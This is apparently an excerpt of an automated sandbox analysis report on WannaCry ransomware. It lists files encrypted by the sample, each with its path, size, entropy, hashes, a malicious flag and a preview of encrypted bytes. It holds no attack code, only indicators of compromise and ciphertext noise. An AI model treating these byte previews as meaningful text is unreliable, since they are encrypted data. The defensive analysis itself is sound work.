                                                  Preview:WANACRY!....T.......H.O....<.H.9#...&u.....z.*...-.++..C.....Dl.k..p.B.<6.1......WB.....0.PV.<..x..1K..t....w~....T..;..U.$c.u."..VX*.8.v.,G...JhW...OD..5%..x`.\..v0......=....a3...I..*...g.......Yp.5S.u.c.3..<<..9k.l..i..#......2.....:U..h8...f..p.Q^....;.............@.n..n&/}......(........iK.N.|L-......K.. %~n.Y.f.M2.5/...Y./.t..S..[qT....`.....d.P.b,P...I.u.1k.....o...E..EQ..f...!.T[..._..O.f.V..G...!...C..H..$.n..o...U.....DD%..fF..s.}.p..>.#....C...d..`....N.#8..G>...>yW.....P<'.L..x.\.........B.....8........h.@.>AqG-.TiX..VdB.?;.].*,...g..R..H&.r.m..k3.)...p.*...........b.i..,....."........j].K.".1G.,-...I%....~.vQ.......}............."Yox.h..H.....S-.<V`..J...*....*.W"....B.1_E..3.D5.<K.5..e.y.J$.....`.^{".....7....r..R...7..q.j.h.g...O?.d.=1....._...46o..qV...I..h...Z.{.Xf......@..y.*&&...aK5.).Ob:.^b...R.=...D.m..8..Gk..w~N.J./!_...c......V.<y.}..Z.M...K`..%r.TC6.........G..-.......Q~..@(W....g.ZX.....T%.."sX..V.....[.......

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):227064
                                                  Entropy (8bit):7.999235571649068
                                                  Encrypted:true
                                                  SSDEEP:6144:8rb7KuFCGLz6rzurFgNTzswz4r5Bkz+mW:8eYz6rziByqmW
                                                  MD5:21C0018D17512CCDA55C61923999D566
                                                  SHA1:A8FADECD851441B56BB047EED4FC5487BBAA3734
                                                  SHA-256:9F431941955583AFF21E88B014839C66C0D998C3C6BA5870304A9B0128807E3D
                                                  SHA-512:BCACDD402EA51BF963482229CAA54B1FB6B89E8E4D40A2B891BC22366BC5AB1B5B2ED9B73602624E33FE4FCEE622AEA0445288CD16F587F93E29D135A51E6CFF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... M..Y...J......'.i.7..d.......n...m...+..l0.z.....v+.3..X....q~.q.h..Ne..!.i3||!...A.@.=..c4..^^.Q.^..m/EF.....y.".,N.1d..).s..Q...)B..NwBmW/.Lm.4... .D..?.B.~.~.cD.X.c.}.R.n.X.;....9......I.i.{..!..u@-..}..#%.4.g.ubU...-ZGVv..h.Z.<5\...V...........u.........k...."pj=.8..h..V..!j.r..Y.*...5.J/P+...~..ty+....Z&.B,......:..cv..,b....".i9>...:.k. j.....#u5.&.!=#.W%:a..h.q.6...@.#~...ep.A.M).....U.....1g..`$p.E....2"i.b.g.~.P1.p"....A.t...6r.w~u......F.S.f5j..0K..$......1.L....]..(...C$..A..=,.....@\c<..|....r.,.<O...C._.Y.......&%lc..|.O..roB.\...k..J.LS.B...=L.`./N.;q.........sY~.g"....o............CL~.'Y..Sv`..H.$..')..b.U..}....M.z..."._4.VV.g.?\....C..c..$\.. }...N....X7..ht.R3}3..L...{~...j..p.W.]..P...qD....Z.X.4.....+..d.cz......e..i....5...~.v&.._...&.U:....Z..v;D.... ....I.$.e.j.0..=..............:dT....SMv.T....*...sM...e.......v...-%.I._].#K...........O...^..S|?oh2.Sk...x.@@.D..>..d.d(......Ui.s.-.E..p..<&T/.ZL+..(..+$w._&9

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):53752
                                                  Entropy (8bit):7.996588520050917
                                                  Encrypted:true
                                                  SSDEEP:768:FBsO/NUEuIaalBjeTrhe2HU259EFY/wRe/imTSAGkNrN3YhxZ9jlWpd9pHEFdyXQ://p7lBCTK4StH0SAGYrNIp9spd9pkFPL
                                                  MD5:FCEF6D4029230BCAA72305DCAB62192D
                                                  SHA1:743319AB25CD8048B4A969F464889CC6FB28DFFB
                                                  SHA-256:E6F9C82243DD147B97B4CCFD99C02FAA7C483478222B0245EDC0F28783A3750D
                                                  SHA-512:86A353144F484ADE0FBA6C7A7071EC58B16B0189AEF6E72EF75B2B8D0A1229240BF20EAB934751A5D8AB3C0DBC3688DED17B0F34797E719046866475A5F74F0C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....SM.QY..C4..,.. {.].?..=F......iCGH..+..7.G...-:./q*G..m....~..@._B..').....?g..UBX...C0>*...3..De..^..K,...~+.5f%_( :.......T.Cca}x......`vO)....x....UH.....y...#......5_......3\!.i'.\....@..# ....B...%.D*.44.O...Hjf....H...:eY.|..SRx.p................./.........l...6...t .l"Q.H.=....'r..H'.86I...1@R..k$B.V..2.x.........[.. Ca..FPW....9...[..L0.}......Y...?7.g........q..ZCV......-.t...2.......J....3.@w....=...7.gQ.^.Mb*|a...JE....v.J.P9..O....j.......m....~IR....T<?..6..7..!q..Z..mOj...~....4..y...aU.f...X..i.j8.3....3.....?..8....Y.j;....B....I..OF.i>....p..J...v...%...:(..,X].m|t..Y.oH...9I...b....i..S&~V..x...`..BW.....{.........!.J.~a+..~.Pj.....N..F.4D5.^.M.U.}.[vK..rT.@=...1.w.....vbg..[=....XD.\GJ.t..I>"..f8dV.r#1...H.pN......*..\....f..+.v.n.6...;..:..>......{&<..1O.K}+.*..n..U........G#.^.....e....MU.$.,c..Xd..}.oxE.$.nu...,."9..B'..,............Nb.@.=..U..D..4.....6.. ..@(3.*...).S...W...A!......./;+........v.`.]=..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_14[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8008
                                                  Entropy (8bit):7.979806667248807
                                                  Encrypted:false
                                                  SSDEEP:192:HLy65yYh1+8m+igp+W+r06OkylI7UU+HqjoV/iQl9qZwTFTgyU:H98wmrYTc9mfq2TgyU
                                                  MD5:9A4A3BB493750D9D0C62825929BF5190
                                                  SHA1:BF9F8C84C8F0991D143DB756C979A155554B05B5
                                                  SHA-256:1B7BAD8DBF19EB3B44D6915DFF1A7CC07531A96AB75A1C9CCDA6104B5E11CEE3
                                                  SHA-512:694B893BC5B49F89C7F114A1AF02D3D68908570D42DAE9B4CC83996AE860E1A60C5FB9215F99D8AEFCA6212213ED962200007C6F0EBDEAB75C2F8C36299A7152
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......,c..z...V......(..!.A|.F..q..F).i.p$.*..N..t.YC...|..i........Vu...L.A..S..R.......F...lC.....^..].,.u.(".n.?...=......J....-9....V....6o#.\.6X..>.5.me.+.<..o".....Ch,I3.l{V9-.sGH.8.r..@.QSgq.v*...w`".....=.......@.-.G..Yy"&...B..d..U...>....................L..1...Q......=.I.......r.......m.u..Z.I.eC..V.#..n..)$....|S.d.!.\.C.mL*m..b....#k)...S.{.......E.....M...Nthzz...M.;..:z...,uJ...crGI .|..*..^N.[T.....0...{..T#..M...H'........*[L.!.(F..O..#..u..M.....u.(.,.b...#.`....X...].<%'...|..v..h.q..q=..H-...e$Z...8..0...3o..(..|..~.3.r..|.Q.,...dG7....Z....{QPn.f...k....j%O.N......t..C.{..9.+..2u..c{!.8-.v...6..Y...J.j...F:.kz.".Ih..N......h.m..q..&.\.MI....P:...(.gL.....P....$..}...x..1"K.`G.l.~...V..m)E. ..A.1~<$.8QV.46....P.`.E.D.6.;\....ts&...-.F..J.).b..!...J....&..T..g.....Oy..|.9@.r.7r..X|.K/9...]/1.e.....!.I.>:X.W@58."..I...*..q.... ..c.Vt#`5L.{=...Z..!..(.~..XS.K.D...z.I.h/.,b.%.....m..f.Q.fvx....VX..^L.\%}...nu.jh...#.u....XIC

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):123256
                                                  Entropy (8bit):7.998652798814184
                                                  Encrypted:true
                                                  SSDEEP:3072:E/bK7la2qY2b7jz02i/TaGN36XWKLkj3fWAOA6HvuMh39tk:ETK7c224bsXWhzO9AovFttk
                                                  MD5:9B3003B94AA23EA2A7B940DFC0358BE6
                                                  SHA1:FFEADC1E5E9413566BCBB851970C8004E934E14C
                                                  SHA-256:B1AEA0A9FB655C86EA1F48222D5B9822A8441BFE3595F34F86F4C3D60B4A2040
                                                  SHA-512:E7DC4398C4C15065CCB2790EC245B7E867B2AC0A276370A851B1D9F20C73F8DF06CCAB0626AE8F4282D6EFEA7360F616E6E2E7D0A77C0ABB6A4D51EA3BD5220C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......6.Yi....7c.X..W.u.*_..Dk.......M.....i.<.Ag.nt"dY...6P+.......%.P.HD.......0.......f....w....c...F...sO.-.G.`F....i\7.Ajr..K..S..M..I....y..N.,..".+.(.....[..Ch.%`?.#).......M..r.<C*..g.....V%{......-.`\..G4.4....`..4n........D..f.....bQ.....Z.........`.=.P.....?P.d'.|.X.z...;.pi~t...<`......nv..$.......~'J.B.C...L4.3@...{|B|Xk.....v....Ke+,r....m.n].r...y.R..oZA.{..,f.~........ .y.R..........{..v/.F.... ISL..3..V..t~6'....0.AL....0.........."..,.`....Ywo..Q.S9rM......!...2...Z.<.a.7.....=..W.U,m....x..E.8.PRj....&M9S..I'7....8R...c:A.'..@.N..b....i..(.N9..H].....M(}..&.C..2eE...g@@&..,......k#`\~.q..`#N...[G{...A...z..."b...'n.lk.[Y....b.q.:?I..@.8...q(.=5...5...k.....;./3...g.[... V.@.....E..Zf.-.+...M....$V..hg..a..|.dj.2dK...^..+4o.N....8.t.H.5....A..M.._.= .........7.."*[xi.t?J...uM.p..]4.r...Y.22.F....Yg.R..q.!..c=.L[.k...<.....!......?......{}..+......Y.dg.......{.m...D.r...@.pN.VNv...".(R.S...Ep..../May..k.503.,Ft..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):95112
                                                  Entropy (8bit):7.998129436564507
                                                  Encrypted:true
                                                  SSDEEP:1536:e/nz2LmkExqw5mM9NkROjVE/Ymu97SV+TfsUlia7D5Banqa94xAkyTd+6Fak9Tbl:RgmSNbq/Ymu97SV+bsUTdk55Td+Gp9fl
                                                  MD5:BC3649C955BCD5E7508965F9ED6D6403
                                                  SHA1:78AAA6363690D35DFDFA33CC14500DE03BCF3BE5
                                                  SHA-256:386DB7ACC4489020A8C74ADD0418FECCE722909F99FA2C88ADE26B70723043A7
                                                  SHA-512:45A4470756F51442A543F21F81E65F295668E350CF94C309BE91B7EF321FBF414E6AEE529DAB8F1A7150E9659124785517AEBD9463A06A2E4E36B9F220578F3D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....R,.C.X.w;...WVeH..z..@.p..v.\k.`.JR.L..U8......./....ks|.?BA....#Jo.w.vF....R?,..M;.B...c.].zC.....m...H.c[iW.0br.....l....q.....A.5.G....G.. ..G....!..7..&.C.r..I.{..A.Y.D...)_...3+a:..Uh....NrV...|.}f.\C4.(.L{.o..ga,..V..O%..jn....a..Q'.Q....gr............`D.D7.1..xN- .N....B].(A].vG...$^...e..&%...yz......A+ .\.H....g8.....BmQ~......,...Kj.BSO...K...%....Q..{".n...~._C`#..W...g.(Rz8.....a..q8.r.)..D...b.7..x.h...../....Y.aC.....zp....WDct.......;...!...Ty.VVJ...?QU....6..h..=.~,.j..8.&....3xG........J.i)..........Q4W..h*g:.rq .n.kX1...pl..D....X..s>..K...8..Mb....Y.v.k.=i..{}."...D.b...+i........v^.3...i.?..U.......-.....nS.O..L.@`..6I|..Qy!`;.....d..<...I...jH.A.R>...j.......>".G..}.#..q..b.yj....N.@../:.M)D......%.N.I_.w..l.....d...........E......q..6Z...EP:>....c.%q.b...h.....n.MU5.....'x...Z.4v.7W..........d.k.Y.....il.~xQ......Q...GB.S^F.W.*...m.gx..xfn..>......:(3$p.&.j.."..p.Z.....P.M3.J.......*)@...8.Z9P8....p...

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_17[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6872
                                                  Entropy (8bit):7.973874521868196
                                                  Encrypted:false
                                                  SSDEEP:192:gsE0nUGTkO88z+9QPw3cPQyaIRvh60U9tRm/re+:BnUGAP8zXh4kC9tRm/1
                                                  MD5:F0FBA1A68AC4F8487C796E56D07B1C7C
                                                  SHA1:505A1F375C1DDF80DB853B10953E2BCDE1ADF038
                                                  SHA-256:3B8B33479403157209DD2654DC33EDD7DD7874AEE4D24E0479B4E6E92D057014
                                                  SHA-512:1B7B6E25BE2673D29A080A4E7BDD92E56F06C79624F3051E6357CE51D013CE3531C6100002FACABD3CDD0CD9974BE67CAC5152BF009941512E4E448702D7336E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......l..I...?}...?.......I+(z.*.>......8....@.*..m...-...s./.?}9-."."... I...t.A7.....R...k...!1...;..u{Y..I..`..3.1J<...B...F|0.^.l... .......t(.?..>.....Q..f.3}....zC.9.GPl.X..@.d......<ZZ....`...4<....*....{{.L........}[-. ...2x\:.........R.............+..lV.IVR(..>.`l...:...{..............'\..tUk........e....}...W..L...`......@;..N......t[.........j@l|\..k...w..b{.R...D..(.+.,.....?"/.h.C.....6..3....>..:...$. .M...jH.H......n.........vL.........f.....K..S..qo=l........)...:.I....!w.>.."{.....@.......G]|.|.-].X.../.Y...l;...1~0pR#....[.....@_MT[A\...I.H.13\..>.........X'..p.B.|..._x*.....M?&N(...RL...l.F...c+.iN..A>..=e..R...}.h.4+.g..m..4..\+3vr..!...t...iL....|1a...M.%rTZ....>..O1g.U.=.........V..\.._*&.[.[G.s.]4...e......N..w.6...$)..q.Tr... ...L....$...i.2..KE..6...o]j.f...._.3..:i:...`%....w..S/.j0.....j...f. X....BrM..W.-.5rz.....H.H\u.C..6E..r.......m.H....).#....C..@..+k.K9...*w..GVO.<...[.4R..|%..K.._<M'Q>W;...sf.hF

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):122040
                                                  Entropy (8bit):7.998798266026306
                                                  Encrypted:true
                                                  SSDEEP:3072:IMOpYVidkf8nKDTssrWZxe6AXypoNuN1vxcwoBy0r/bgzvL5TBxc:IZpYV0kkK3FqZFpwuN5kr/szvnxc
                                                  MD5:9E228DC8C70B8D4D2A87825198B2C89E
                                                  SHA1:0F760A08E68F1F79335CB539EFEF6A7D2AB82E67
                                                  SHA-256:06578EFFF5B271D7F94291441186236C5EE20D6AE9842259F13993580E0AB4A6
                                                  SHA-512:990BE55B722E762237ADA97F369BBA8B70FF575F6979D91F9B550BEC9F247D4EFC76DA20B3D4216D87CA906EAB11101B7CAB44659C52F3C5FA93F500ECC86715
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........<..S......c.JL.l..\N#.;..cgVN$Z.b.{x.....R..^....F.t.L...<Vg.3.......=..A}.t.1..v...}m....)......L2m.ZN.....n.J>T.z..<=PKK.....g.....bN....{$&...(K.(..[.o0.$.......@N....x$./.&...W.......~..1......0.U...(e.".!q6...(...P...0q?x..v..u.."w..............w....51*\...!9.....u.7.t..fk....M...vq....r.7.6.kD.t.<.o$J.......J..?."....../.$~G..JI.D.@!x....._..8..T.....4...r.(K..!..0.S.r|.O.....~.!..D.7..<\u.h....k....zd........+.[..........,..Z.&.Y2.z.#QSX.e.t5i...Lp.:&T..&..<n9.iHn..A.'.&\*....D$..$..F/.~2 ..ms..U...h..._......kk.....(AV.w|.Q....]2.'..7.K...]..jB...]..{....2.lR@qm...r......0.-.ae.9....$...B.....0.....7+-N...E...(l^;_........,..N.X.LT....::..e......ium...n......x.P}...8...7l.I.\..zW.9.t=..{...jd.+..[p......c|..@.GXv..:.V..y...,q....r...Y...[...`n..(.z.o=..........K..E.t....d$}...@.u.Y(...o....)&.n0.?.....Sh....c.=1=...S.(,!.q.$q$.w.(k.c.Gbh#.Y..!.fK^...n..vs...]i24.-.Tp.X..?..3....>.?..A...}.Y...bP.......P ......;.%

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):121496
                                                  Entropy (8bit):7.998660357706123
                                                  Encrypted:true
                                                  SSDEEP:3072:3rUS6Uqzgf2gKxJlU8ctEm1SRiZvPh8r6ffAY3HuntBr+69:3wSMEfwxjU1tEGhAuHu7+2
                                                  MD5:BA49BD89752B2C872712AC3BE47EEC73
                                                  SHA1:84DE1278D3B7B4FDF400D22DCB1CA9D8417D3FAA
                                                  SHA-256:67636A7A09C07064161E06D68B57B4B8B0B36840E916577E253330EA29937C9A
                                                  SHA-512:E1ACF23D1D8D0D5AF3256F7439B4AE2BAA51A4E00B72ED51270BEFE77B75219AF7F0D6F252B0F7D2679A98C35E40023E4F6842E49DF6CEFDCF3794E36BFC0EC3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......Rs.WSV..S./../*.S#%.f.z..ME...<.>D.1....!....'T........f..=.P.f....j....."..!.0.....H!...S.9........frJ.N.... ...W.@......c..~3,..$.X..!%......1Z.;.......yV.7.....A.....E...c.d.q 8`..9..f..|.`T.IY.+..:<.(......c.%./MG)>..lz.../.WB...'.c.('u.................Q......;ATH.J..e^..4.(z..dG9.......f.8.....z..y{z_.>..G6..f.$\.,...Ml...q.S..g..M.T."...D.JyV......h....([.C.@.....3.._3^..y...Z.c"c...Q./s<......Y...R.@....(|.x.(....h.j..._.\.....u..ET....V66J...E...[...lp.............q9k(Kq..e.9..vFu..m$...~'....l......}.?..o.....o.s{...^.y.. .d=p.....{.h..4......%],M..............FV.2...q..E..^..... ...r..`......a]63.nU...3.I.5:..5j..q...-C.+.A..*X.........m........&....x......u..R.g%:.[.#.=.........'.@v....O.....q.9^>[(....A...bi.........1..q..H..e.w.9j.7.......u[.3.).q.:F..X)*.S ...y....q.f...q.( ......N.#....Z"..j.7.*.....&P...M..".........Ip^0..Y.#F'.m.d.7^*......W...r..U..y..TN....-....t........q.B..L...V\...1.i....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65784
                                                  Entropy (8bit):7.997296961858981
                                                  Encrypted:true
                                                  SSDEEP:1536:WLZm/gnFC4iV/czwR9F71sloUI4LAKjaN7BI02Kk6:WLEghiJc0P9uloUI4LAKjaB72U
                                                  MD5:A373FFACD1298403BD4B93590165A584
                                                  SHA1:84593737E386EB90A9AA5FE8C23BF8504F8EFF59
                                                  SHA-256:111D8597817A6A91C38FDD2E57F0EAE1D8C387E49B922DF34C3DE7879F3FF156
                                                  SHA-512:8320C03F00956DD685383C03E7357123086B297787ABDB2D9DE076FE86AD534C59BD4655556E4250F5B833DE9307DC0B9ACCD1775A4E95FE6683BE08858F4F5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....:E{%..!iZ.......Y._ .'.T.`jY$. !.3,.....T..Q07...Tq.=.se.s......0...P......f....._..M..d.....9.N....~.F.6.......x>..0~.,.....Bh[e.._Y.^.?.......Ia9..@.S.#.e...=.h.)*.X..J....V...C.......-Cx.....&..........wB.....'xV9...,....I..O....m.'.................o.N._.v.M...;.X8..S.<vh......j..=@..K{.,\``|........%....o..,."K}.;a.>..a.tA..:x:..i..j.^q....=O.....@.......U..........xvU.....$.....x@2I/.8j.j.z.4...(b......A..Hz.b..<_.....^Y.O7....KN..=..^.e.'...AH...o...h.k...C...j.f.....N..........G.'......e$8<..W,..o..S...[S..y!%w.|....../v}.o.....h!,.I..=-.e.S...Z^.N.(.E.....d....NkF.#q.%..o..3..0..b......xYm....."...F....*.`.%M..u.".sp.....j.}..K%j....h........U...$..=.h..........5.K.GA.M....L....W.....q.Q.3ld....H.............5..i.i...2.k+ML*...y..<.}x"...h....kF.v[W.....eA....9.6..x7.5.;i..t.r.6z..R..M>0|.M..e.&'.B...{.xZ..bh.,..B9...........-....9n+..........?3J..X.........6,ds....Z...iI.P...Y...{0.H. Z1Y2.A.....M.e5..$R....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45800
                                                  Entropy (8bit):7.995937744072546
                                                  Encrypted:true
                                                  SSDEEP:768:E+gIFLUpnZ7mv45nvvLCTwhVnG1fJuFAA96:EbUC1E45Hn+AAV
                                                  MD5:40BF11A814096E7E5D234495BC5D23A6
                                                  SHA1:EA16977CA2E8D0CEB7839928C895CACD2FB0E322
                                                  SHA-256:B033FCE237DBF0F1B99E25AD3A8827033F01BF6205166D7466E216C788DA6B48
                                                  SHA-512:0D733B61D27D93612175E2610709CE24A6A4FAFA0AC4B05E08385888EF72944DE713B5F7437F3CF346129CAC461B02EF3C91907EA7FD6E0A8CC0863EAD73CE39
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........c.&...`..%..x.;s1.u.{(#..............l.A.......B....XX.r.....z.#9..!.x......|....J..Y...r.H0)m..~...H..."......Q.....@...^@.`np_6.%N^nS.$...*.L.X,.=F......Y.Vu..j.....4-....1.[Y....o..W...Q.....;dlqYG...=W.P....#..U~.Y........ .=9../.8_C.d...........8wZ.'9..{....'G....r.kBQ.}../E.s....}N.k4.,!<h].)...=.;H...m>y._[b.X2....o.Z..r.c..Ax.g..o..{.$..W3.O!y..........}....BEG.^...S...V.F..t.5.HN.9.O..k...6Y....FJp.D....._..W.[.......aP..K..............i.....y..%......V.)..........q._K..s'.&+......E.>m..+...t...J.)`p.~....w~...\..D..e./*>.....-...[.m..i.@..V.A.Zb.!.KTL..V4....|...S....5(a._a....V4?..b?......@L.9...9....W......p |....\U.*..e.....wo..........^JI...6..&z>d..J:K.cV...:....(.".No*|....R.. ..L..[Z (.T.2><.CG..J'9<.r.......4..A...,....z RW....<un.....s...!.t...Q...I...."[...]E.a.8...W.Oo..Z.,...s\..........3N...Q....k....hW...D...<..#Q..0.QI.v.P.J2].-.l;..r.D....&T.."k...,k .g0..O.../.....f.1J..O.S..Z.s.k...t2yw.;FG6Y

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202536
                                                  Entropy (8bit):7.998912684048249
                                                  Encrypted:true
                                                  SSDEEP:3072:TC98dVvGau9ze7EH66N8HeDfdb4ovF7UjMfc0n53jfmfUzDAzONjYrK21PqaM13x:TCgnJ7avhdvF4s5uUzDAzLrFG13JrX
                                                  MD5:F014E9DA54A31FB1100E3CB304A3F6DF
                                                  SHA1:892BD349F27B5E08D0DE1D139BE8214CF7A9C5C1
                                                  SHA-256:AC9FEBB3F3F3FCFC02E99EEDBE42209EDA2C317D3D0825036CABA001E99FF127
                                                  SHA-512:E6D49D57BB94294E18F105247A2AF573EDE79BE55A4430997F99512D4D0E2B8C95A6EDDFDAD2521FB3712BA85DEB11022A1C5BF6EE1CB3E30D9369D36FB3A402
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....H.l...y.7R.P.|llIV...,.....S....BWa.f...o..\Q..}.[."r... ....*.n.R\q....l....(...-|c.;..n.8._tA...R.+.C....s!(.....9f.....r..F.....e..XDZ/\.S ....y..6...w...L\oD[...l3..t.z.B.....]........l.&...BWn..r..L.....l...&*.....U.D.B8HSDP......B..............Ht.,5.>/...[X-.f...Br.\xT.j..S..7=..oT$.......D+.9.....ko.[.,A@s...........?#..Sn.l..4j;....y..a6F.#..a...J..........I.&5.}....\.V..f.sO'VE.r._.".=....c@.C.(..Q..iwm.a.g.P..^..pY/...5.De!.vT.4.....5Fo..2.6...@.....xq...0._.+.J...k....5..]".......^M........D....3....S..)`....m'..{...^.ka......v.a5.75..@...N...l.x1*...o.]_..^..p...,.H........"....mk..TG....B......."......-SBe.... :.LD...#..'...5.2.I.1#.a;)...R.ld`.v....3^B...7.E...]#.&..L...X4...$k....!Epr..$(..Z...Gr..^......X.>;....l:.u.....q..o...Fv\R..1..+;Rg.Hu...}...B.........V.T.H..=.a5...#.O.....t..nSzi.YL...@P>...?................C5...Qf.F..Mx.=....c'.p^..*.I.(...6.4..K;...VP.s.q.,U.a.t)........1Q. 1...1Y.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_23[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16200
                                                  Entropy (8bit):7.988130625428985
                                                  Encrypted:false
                                                  SSDEEP:384:ZNUzD0/mukiAA2otagQdskOKi5hI3uyDuwmIAPCKXB0NDnY78z:TO0+uzk3pdsKi5hI3uafPLKKFnY7O
                                                  MD5:25E2613C7507A8A9222F6B431A55CBA8
                                                  SHA1:584B5D1399BB6B3823DC3D22890F2847D2F65BF7
                                                  SHA-256:A7DC0D1133B84274B5B4E0E7A270318AB853A453B383FC4F2C020257CFE62709
                                                  SHA-512:F716D68C3518487602DFBB7EF3917B2B5E45E7B7B2B995CDAD43FE4E72ADD882C56C2D9F2999E1A91EFFB0902F712B609FA44072BA86EF68C6FFF11F0DAE4C39
                                                  Malicious:false
                                                  Reputation:unknown
